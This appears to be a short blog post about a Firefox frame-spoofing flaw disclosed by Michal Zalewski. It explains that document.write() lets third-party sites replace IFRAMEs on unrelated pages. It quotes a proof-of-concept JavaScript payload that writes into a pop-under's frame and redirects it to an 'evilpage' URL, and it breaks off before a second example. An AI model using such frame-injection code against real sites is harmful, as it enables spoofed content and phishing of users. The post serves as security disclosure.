Firefox Frame Spoofing.

Yep Michal Zalewski is back with 4 new browser exploits. And when he is at the wheel you can expect some good fireworks. I picked one out of the list, this one deals with frame spoofing. I've heard about it a few times but never understand what they meant with it. Now Michal Zalewski shows us an example, and a really cool one at that. The code is fairly easy, a great intellectual exercise, but immensely dangerous. Sometimes I loose my faith in Firefox, these days are one of them.Description Firefox allows third-party sites to replace IFRAMEs embedded on unrelated webpages through the use of document.write() method. This problem was discovered back in 2006 and meant to be addressed by this Bugzilla entry, but a distinct attack against about:blank frames, as well as all other IFRAMEs during their load stage, is still possible.PoC: http://lcamtuf.coredump.cx/ifsnatch/Spoofing a fake CNN page which is loaded as a popunder:<body onload="foobar()"><script>var pw;function foobar() { pw = open("","CNNtarget"); setTimeout("pw.frames['pipeCtrlFrame'].document.open();" + "pw.frames['pipeCtrlFrame'].document.write('<scr'+ 'ipt> " + "location = "http://lcamtuf.coredump.cx/ifsnatch/evilpage.html";</scr' + 'ipt>');" + "window.close()", 3000);}</script>Another example that injects code into Google frame: